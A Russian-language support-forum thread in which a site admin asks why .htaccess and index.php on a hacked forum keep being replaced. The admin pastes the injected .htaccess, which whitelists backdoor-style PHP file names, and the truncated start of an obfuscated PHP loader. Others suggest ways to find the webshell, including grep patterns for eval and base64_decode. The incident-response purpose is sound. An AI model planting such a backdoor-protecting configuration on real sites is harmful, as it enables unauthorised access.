Изменения файлов .htaccess и index.php

[волчара]

Приветствую всех
Проблемка образовалась, в чем причина понять не могу.
Дело в том что в последнее время, а сегодня уже второй раз меняется содержание двух файлов .htaccess и index.php, права доступа обоих файлов 644
Содержание меняется на это
Файл .htaccess

Код: Выделить всё

<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

Файл index.php

Код: Выделить всё

<?php
$OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44
..........

Помогите разобраться, версия форума 3.3.8

[Siava]

волчара, права доступа могут быть и 644, но владелец например тот, от которого работает веб-сервер. Ищите загруженный шелл или бэкдор. Возможно у вас кроме форума есть ещё какие-то скрипты, через которые и взломали.

[волчара]

Siava,

Ищите загруженный шелл или бэкдор.

Подскажите как их искать, может есть команды для консоли?

Отправлено спустя 16 минут 1 секунду:
Проверил тремя командами

Код: Выделить всё

find . -type f -name '*.php' | xargs grep -l "eval *(" --color
find . -type f -name '*.php' | xargs grep -l "base64_decode *(" --color
find . -type f -name '*.php' | xargs grep -l "gzinflate *(" --color

ни чего не выдало

[Татьяна5]

Тупо скачать всё и пройтись тем же winmerge (на всём, включая расширения). Плюс загрузить во всевозможные антивирусы, иногда ловят лишнее

[волчара]

Татьяна5,
Скачал весь форум, прошелся тремя антивирусами, все чисто.
Сравнил(прогой winmerge) старый бэкап когда только обновил форум до версии 3.3.8 с сегодняшним и различий не каких.

[Татьяна5]

Тогда либо в БД вирус засел, либо в загружаемых файлах (вложения, аватарки, файлы из расширений)

[southklad]

Ваш же index.php это файл Вордпресса, причем тут форум? Смотрите как раз в сторону ВП, какие плагины ставили, что делали.

[волчара]

igorbond,

Ваш же index.php это файл Вордпресса, причем тут форум?

Я сперва тоже обратил внимание на это, потом вспомнил что когда то я устанавливал его(хотел посмотреть что за "зверь" такой), но на Поддомен, сегодня утром когда у меня файлы перезаписались, я сразу удалил его(Вордпресс), вернул файлы .htaccess и index.php в рабочее состояние. А вот после обеда опять слетели данные у .htaccess и index.php, пришлось восстанавливать их опять, почистил хеш физически и вроде пока нормально все. После всех манипуляций сообщил и попросил помощи на данном форуме.

Тогда либо в БД вирус засел, либо в загружаемых файлах (вложения, аватарки, файлы из расширений)

Буду разбираться, хотя не давно примерно неделю назад, мне на форум во вложения залили скриншот, она по теме форума была, с час я ее удалю.

[волчара]

с час я ее удалю.

Оказывается, там было три скриншота во вложениях, а показывало один